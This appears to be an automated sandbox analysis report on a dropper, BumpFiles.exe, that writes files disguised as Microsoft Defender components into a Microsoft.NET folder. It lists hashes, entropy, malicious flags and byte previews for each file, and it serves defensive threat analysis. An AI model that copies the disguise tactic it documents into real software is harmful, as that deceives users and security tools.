                                                                  SHA-256:D132DE7BFAFDA6F0A9CFA4A829892FBA6C531D721C4A1BA9918BD5553BA0336B
                                                                  SHA-512:92E737A59BE464ADB5152C4406E76578CC70FECE2E58EAA845A654A1A70BBDBF7EB57B3079179C8666944111FEEB59E3D54F0CDC61B7F5639BEC62D31B851B46
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)m.m...m...m....y..l....y..o...~..|...m.......~..w...~..c...~......y..l....y.......yG.l....y..l...Richm...................PE..d......+.........." .....p..................................................@............`A............................................................X....p..(P... ...%......,H..<...p.......................(.......8...................D........................text....d.......p.................. ..`.rdata...S.......`..................@..@.data...D........p..................@....pdata..(P...p...`...P..............@..@.didat..............................@....rsrc...X...........................@..@.reloc..,H.......P..................@..B........................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.mof

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (4929), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):94958
                                                                  Entropy (8bit):3.592146871128743
                                                                  Encrypted:false
                                                                  SSDEEP:768:hvQJc7QeBhFbUAbYzlyZCvQJc7QeBhFbUAbYzlyZg:uMbgyLMbgya
                                                                  MD5:4B23206905E11134BEB571548C245F3C
                                                                  SHA1:3E0AE50991CD2422E1C2FDCC9C6F6DF8EAB18FEC
                                                                  SHA-256:2CF7F8EF415A75427E90C50BC18BF5FBE25398A3E805A08F0DA5DEEB48C7CCA1
                                                                  SHA-512:9A758F7C1BC185EDE944CDC6A12B2664F5A1EBC31623FE40C469E317199D5A93E8CCB786042C4012D3ED3D57E271C853D60019D516BA399430ACEBD4BE938E5D
                                                                  Malicious:false
                                                                  Preview:..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........I.n.s.t.a.n.c.e. .o.f. ._._.W.i.n.3.2.P.r.o.v.i.d.e.r. .a.s. .$.p.r.o.v.....{..... . .N.a.m.e. .=. .".P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.".;..... . .C.l.s.I.d. .=. .".{.A.7.C.4.5.2.E.F.-.8.E.9.F.-.4.2.E.B.-.9.F.2.B.-.2.4.5.6.1.3.C.A.0.D.C.9.}.".;..... . .I.m.p.e.r.s.o.n.a.t.i.o.n.L.e.v.e.l. .=. .1.;..... . .H.o.s.t.i.n.g.M.o.d.e.l. .=. .".L.o.c.a.l.S.e.r.v.i.c.e.H.o.s.t.".;..... . .v.e.r.s.i.o.n. .=. .1.0.7.3.7.4.1.8.2.5.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.M.e.t.h.o.d.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;.....}.;.........I.n.s.t.a.n.c.e. .o.f. ._._.E.v.e.n.t.P.r.o.v.i.d.e.r.R.e.g.i.s.t.r.a.t.i.o.n.....{..... . .P.r.o.v.i.d.e.r. .=. .$.p.r.o.v.;..... . .e.v.e.n.t.Q.u.e.r.y.L.i.s.t. .=. .{.".s.e.l.e.c.t. .*. .f.r.o.m. .M.S.F.T._.M.p.E.v.e.n.t.".}.;...

                                                                  C:\Program Files (x86)\Microsoft.NET\ProtectionManagement_Uninstall.mof

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2664
                                                                  Entropy (8bit):3.464075447819169
                                                                  Encrypted:false
                                                                  SSDEEP:24:QXbclfUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzSJjWvlDQzfWvlDQzyWU:eTjDGwJ3SJnr24RFZ7a2la2Sa2mWaWP
                                                                  MD5:C4E26C53F76774E091FEE17FFFF64414
                                                                  SHA1:5CB3AD07CF6DFF3DB5BAAD55488A769A664BC093
                                                                  SHA-256:5172863C41E84024799B2034D42F10E9720FC53171A4F6C1CA2FDB2C6F71DFE9
                                                                  SHA-512:635DE182629A248B9BF3061E1A1C1D3ED904B8843187B64CEB3BF96DD4B10769D9E001EAEECED2179350F7012C82317B2C833A8501FF9C92D1A0CE94C711FEBB
                                                                  Malicious:false
                                                                  Preview:..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.R.o.l.l.b.a.c.k.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.

                                                                  C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):165208
                                                                  Entropy (8bit):7.110142692986595
                                                                  Encrypted:false
                                                                  SSDEEP:3072:vMxVQoQqFTs8U+Nwy8bhpgENIf5eeT25+h6+iU:v8s8tNwZhpgEKfEeT6m
                                                                  MD5:EBEA28C15DD26C1D0C1944215F0AAE8B
                                                                  SHA1:98375B311B8D56DA260961217073B30D1AEFE089
                                                                  SHA-256:E36CD8ABDA4C1E71C9E322550ECD3F6B76B1D6ACAD014F7DFA11F72A0ABC674B
                                                                  SHA-512:05E17C27A257229BD67096D0E2858C9A120293983F8F79AA9A884F97A4F867A00AD1ED7DEC846EC54F236B44802B7A6C57E752B81277510B90F930BDB6714F11
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d......W.........." .........P...............................................`............`.......................................................... ...<...........`..X%..............T............................................................................rdata..............................@..@.rsrc....<... ...@... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):403816
                                                                  Entropy (8bit):6.1451106536127735
                                                                  Encrypted:false
                                                                  SSDEEP:6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
                                                                  MD5:FBAA9986931D1ADEDA07A6EF8F04AB6D
                                                                  SHA1:5FB959351940EB94EEF9D8E21D95436B77FEB9A2
                                                                  SHA-256:3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
                                                                  SHA-512:A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.u.3..,3..,3..,'..-1..,V..-2..,V..-2..,'..-9..,'..-!..,:.,!..,'..-...,V..-&..,3..,...,'..-]..,'..,2..,'..-2..,Rich3..,........................PE..L.....,......................L.......H............@..........................@.......Q........... ..............................|....0..................h/......,F.....T...........................H...........................`....................text............................... ..`.data....).......$..................@....idata... ......."..................@..@.didat..(.... ......................@....rsrc........0......................@..@.reloc..,F.......H..................@..B................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):25936
                                                                  Entropy (8bit):4.328275985676387
                                                                  Encrypted:false
                                                                  SSDEEP:192:9+DWgAHWglQBEKLO0cCroDBQABJFI6eYIN5vCX01k9z3AzfSXDlG6P:cWgAHWtBEJlDBRJeWUJCR9zUwDM6P
                                                                  MD5:4A8B58C88DF1C607A9DF21EE390CA8F8
                                                                  SHA1:18B995CA90D74D34975F9DF8E8611F35E7B94E9D
                                                                  SHA-256:1A90C01C3FD40E5CEE77F626BF9883B5D276132252E28EE4B6C2C02D9CD30E4C
                                                                  SHA-512:1ECCD6FB016C7E43FBE63120A2A43135B17453AF428658E11EFD69F753FEE5A5F227202144CE85840388E138D392F0A528450B37DE23EFE902CC467A5CD4F1DA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d....f............" .........0...............................................@............`.......................................................... ..0............@..P%..............T............................................................................rdata..............................@..@.rsrc...0.... ... ... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):587096
                                                                  Entropy (8bit):5.955146470563534
                                                                  Encrypted:false
                                                                  SSDEEP:6144:UoSVOVSccnel+Z/smH98qn3xVPNCqdeAB5l6Hv7YPdr5/NJSFiimiTVVmVVV8VVp:ULOVSpu+Viq3xnJdtn6jUFYNN
                                                                  MD5:2776A2B1C9D82F3FEBAA8CA1F5544992
                                                                  SHA1:28620B6498EEFA4E411686FEAC1C0E03D66B661D
                                                                  SHA-256:D1F81D7C43B522E39F0FD14E1C25F97E7894CEBBE1F43320CBB66BE1528A7A72
                                                                  SHA-512:2FBCA83415F5E927B38DBF7064CAAE1CD67EC2ACBA6C00AEB3520F9C8BC3B9DE46329CB57B2D1D9DC7CB33BD89766E6C8C3DC3C1FC6B3DAA885CB50FE64C5E2B
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...................................................................................Rich............................PE..d...+WSF.........."..........P.................@..................................................... ...........................................................6......X%......x...TY..T......................(.......@...............`............................text...L}.......................... ..`.rdata..............................@..@.data...`Q...0...P...0..............@....pdata...6.......@..................@..@.rsrc...............................@..@.reloc..x...........................@..B........................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\ThirdPartyNotices.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:ASCII text, with very long lines (467), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1091
                                                                  Entropy (8bit):4.900567214358779
                                                                  Encrypted:false
                                                                  SSDEEP:24:8uSJLsnMRsAvARsADXWBDk44IuNhbgU0E+4HQk1LpsLtbY:89LsnMRsgARsqXWBDB4Tvr06H319ou
                                                                  MD5:314CE81BED1547B8FA40F405F4C8B9FC
                                                                  SHA1:6A1A717B275B90BA77A43EF77FCDEDBC7E6F7CE2
                                                                  SHA-256:00D799DC04FBDF92BC39218C22723C61C3204A82B1FC418E6AEA65E6ED111CE8
                                                                  SHA-512:143A0D92659BB088F2282BDB14F465D58EA9E0E57D261741CC9AC7B507BE730F4B0A62E9A9BF0B73BF19FDF6F44F2977E2C77875E28AC30E461155BDDB59A047
                                                                  Malicious:false
                                                                  Preview:Files originating with or related to Casablanca v2.6.0, a "Microsoft project for cloud-based client-server communication in native code using a modern asynchronous C++ API design. This project aims to help C++ developers connect to and interact with services." See https://github.com/Microsoft/cpprestsdk. This material is licensed under the terms of the Apache Software License v2.0 (see https://github.com/Microsoft/cpprestsdk/blob/master/license.txt), which state:.... ==++==.... Copyright (c) Microsoft Corporation. All rights reserved. .. Licensed under the Apache License, Version 2.0 (the "License");.. you may not use this file except in compliance with the License... You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. .. Unless required by applicable law or agreed to in writing, software.. distributed under the License is distributed on an "AS IS" BASIS,.. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... See the License for

                                                                  C:\Program Files (x86)\Microsoft.NET\bin01.zip

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):142
                                                                  Entropy (8bit):6.55447018279355
                                                                  Encrypted:false
                                                                  SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                                  MD5:57A37BD0840D0745A9481BCC25B5A792
                                                                  SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                                  SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                                  SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                                  Malicious:false
                                                                  Preview:H~.E.L......z.'.<.Er...a..]...`rf1_B..U.~.e)?...Ri..{.. X..ykq...&..(...Ri..G..08..<.Er...X}_.....V ....j..PK.o..'a#-.=D4...d......&.

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2560
                                                                  Entropy (8bit):3.2580418248791343
                                                                  Encrypted:false
                                                                  SSDEEP:24:eH1GSp85gpXsFCZIN/at1IyBIZW0sTf5cnaw7ScNffz745U35WWdPfPN3Tc:ypK2BZ+W1I8IZWPTf5EdHffA5K5Ww13g
                                                                  MD5:EE08DF3A08F49B9A7239F0DE796E5DD0
                                                                  SHA1:461A532C71E6C20FB529F340CDF89DB4845200AF
                                                                  SHA-256:5959174D18270B856CF01B69223623E231AEF539F71B20336E0BE764F4C632F5
                                                                  SHA-512:7E6274FB38113EF69B132C5687EC4E08FFD09A4C1CA85B82441470D20AABBB55814E97EF8EE6DFA08A377719FB71ABA6A94F1217554C3463173AF12F93038222
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0.......|....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....a..........l...P...P........a..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...p..uI..$f.}II...3v...~.qIp;.a..........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50688
                                                                  Entropy (8bit):3.394595207496583
                                                                  Encrypted:false
                                                                  SSDEEP:768:QJbyt33c7EhrdTTm147vXahEzhEthEGQRQwhEfSm:QJbytHu6rdd7vM+4Ivm
                                                                  MD5:4CFEF0FE4901B062F4B169B97F8CFD31
                                                                  SHA1:3ABE261FA1E8625FE3155B0D4B98D0D5903E1E1C
                                                                  SHA-256:5A89EBF5211FE4E51ED4D5D8FE1FEEC591A67F2F1632C6C0873CB44028386F43
                                                                  SHA-512:B1D8D65B6E781019618119F71500EC082018E11DF5562C878E34E1EC54FEF770F6B9F095A10D22B550FE137F1177057B507A1845048BA170EC762AAFB21D52CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................~e....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....d...........l...P...P.......d...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..@....rsrc$02.... ....^K..8.........HQM....H..IMd...........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):43520
                                                                  Entropy (8bit):3.4967857595832523
                                                                  Encrypted:false
                                                                  SSDEEP:384:ZtOioFEr4H1O/Dtkby/g1mwhqfB9hy0VkkWoBFH1ANl8CWupBW4:MBHI//1ANl8yp5
                                                                  MD5:FF86B38C73EED57883F04E1E61C3A213
                                                                  SHA1:6DD75F604393D70288AA1E28392AB83701B67650
                                                                  SHA-256:A7303F3077D7890C7CB889C7DD4A913BB0E5AB94E8DD190F258C85BF0A81AC28
                                                                  SHA-512:AAD695468C28F5E02DF5171294151BFA3A96D97203661C7278B4F2D37C167D8A6DE48A6AE9E50BCA6083A5E968497FEFC7526B2FCAB1A1F2396421A187CA798E
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......................................................................@.......................................... .................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....D%.........l...P...P........D%.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02.... ..........f...T.e.J#.3...:.o...D%.........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8704
                                                                  Entropy (8bit):3.57992330655092
                                                                  Encrypted:false
                                                                  SSDEEP:192:WWFmd28sT8KF7Y1+z7YNiuErC0IQ3obWNfpW7:zYd28sT1F7Y1+z7YNiuErC0IQ3YWNfp0
                                                                  MD5:E38287B098C2A55EE69A224BE73C93E8
                                                                  SHA1:0422464BBDA490FBC74896494318B5A141CF2710
                                                                  SHA-256:B61780AE34673BF797B85387036E01A03DB9F3D949BC23AD87EFD0A1D7EBA03E
                                                                  SHA-512:9126D8CDA5E1E898D443B9A6B8757F0FC205E599DE84241C0F0418857FA0D30DE1885AD5D04E539476500C15C6BEB4E2AB438564B7A6DDD3E7A898621059C6C6
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......... ...............................................@............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....oM.7........l...P...P.......oM.7........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... ...Z..../..)......C....b.)....oM.7........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):7680
                                                                  Entropy (8bit):3.529446079422097
                                                                  Encrypted:false
                                                                  SSDEEP:96:ZqJtrkDSJ6Spy99V9KzEcEKLqmqYgAMkL1J+8PUnW4+EW6brWwg:ZqJOvDAzzgYR7AW4TW6brWD
                                                                  MD5:D186BEDACDCCA084DA65C65D598EBCA8
                                                                  SHA1:3C48928EC8FE199545C0AD5ADEE27A5AC61E3D99
                                                                  SHA-256:363B8713FA608B54832C5F78E17331D94F0E888B98A0337467B5B1A5A18E7B75
                                                                  SHA-512:4B1774C4200BCD1161C8B00A9D5FFF11B6FDE35559531A578DA0EE6ED97A255FFF4FFC2B3C1E28DFCCCD2D77E616B92F91749F4BFD2999C105A00809C2D1359E
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................@............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....o..........l...P...P.......o..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..p....rsrc$01....p"..8....rsrc$02.... ...5...p.......9ps].A,wEW.....o..........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):35840
                                                                  Entropy (8bit):3.534239180172005
                                                                  Encrypted:false
                                                                  SSDEEP:768:zFMCgGn67PzUf+YXIurmXuQmMVhjhxpIE:z2CpjZXIVXPiE
                                                                  MD5:3C50201BA7B59C83412E463689D9798B
                                                                  SHA1:A97F6D79D365B72F0AADCF2EA0B77C1FBD0940E3
                                                                  SHA-256:DD449C37F48009C37ADA9339185E8B30A50CC97F17E2979AFBE04B9A40F2B26A
                                                                  SHA-512:32DFF7044961E0254E38D592734F1B2566D4F079DE1611C6866F437F7DA9F2B257A89CA84C46D832B8CCA394866BF60B6203DAC2DD680C11FAC17A2D72BB23EC
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................d....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....]'.........l...P...P........]'.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%......rsrc$02.... ...@.`........m\.L.HO...i.<.U.x.]'.........................................................................................................................................................................................................................................................................

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.mfl

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (11632), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):95866
                                                                  Entropy (8bit):3.503699910346522
                                                                  Encrypted:false
                                                                  SSDEEP:768:r7EIEB87ovwzUHfRWKXdxXMJHro8ozUUCaOZ5f5XPu1QcQBQEY46bY4814OT6/5k:rK4GXMa4BXPrY46bY48iOO/2
                                                                  MD5:675269F40380DCD00A2E2144A57F610A
                                                                  SHA1:B663129AD88776319E98519784CE2B21765AB196
                                                                  SHA-256:87E91B7FE6743B8DF9379E109B543D5BF6F41AB16198BB0DAD78D1C249D61B1F
                                                                  SHA-512:0E79DE4580FBC1E44DEB12AF91052125D0860574C4B2CBD9DCFB6F02DA6A568BCD11C34E35EAF403E78F112FC532FE5138C5FE0E5D43348483BD5A72F93DD65D
                                                                  Malicious:false
                                                                  Preview:..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).....i.n.s.t.a.n.c.e. .o.f. ._._.n.a.m.e.s.p.a.c.e.{. .n.a.m.e.=.".M.S._.4.0.9.".;.}.;.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.0.9.".).........[.D.e.s.c.r.i.p.t.i.o.n.(.".T.h.i.s. .i.s. .a.n. .a.b.s.t.r.a.c.t. .c.l.a.s.s. .t.h.a.t. .s.h.o.w.s. .t.h.e. .b.a.s.e. .s.t.a.t.u.s...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.0.9.".).]. .....c.l.a.s.s. .B.a.s.e.S.t.a.t.u.s.....{.....}.;.........[.D.e.s.c.r.i.p.t.i.o.n.(.".T.h.i.s. .i.s. .a.n. .a.b.s.t.r.a.c.t. .c.l.a.s.s. .t.h.a.t. .s.h.o.w.s. .t.h.e. .b.a.s.e. .s.t.a.t.u.s...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.0.9.".).]. .....c.l.a.s.s. .M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.

                                                                  C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement_Uninstall.mfl

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1118
                                                                  Entropy (8bit):3.459513705694916
                                                                  Encrypted:false
                                                                  SSDEEP:24:QXbclTUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvlR:enjDGwJ3r24RFZC
                                                                  MD5:AFE6664D26D5D05B4568E329BE37D7DE
                                                                  SHA1:2F6FD02E26E9F3A09866F3C106A8C1539B50D46F
                                                                  SHA-256:B6BAC201F1586B4C357521C46421086557A0DF86A022B120B723EB047E450D43
                                                                  SHA-512:8C1AF20BF892C303F8247B6E991A96A59CB0C65AB7E11C630282AA1B091FAEA8B27AA08210249FE2B47FA9488834E82487490581B54B236461FE61CF346F623E
                                                                  Malicious:false
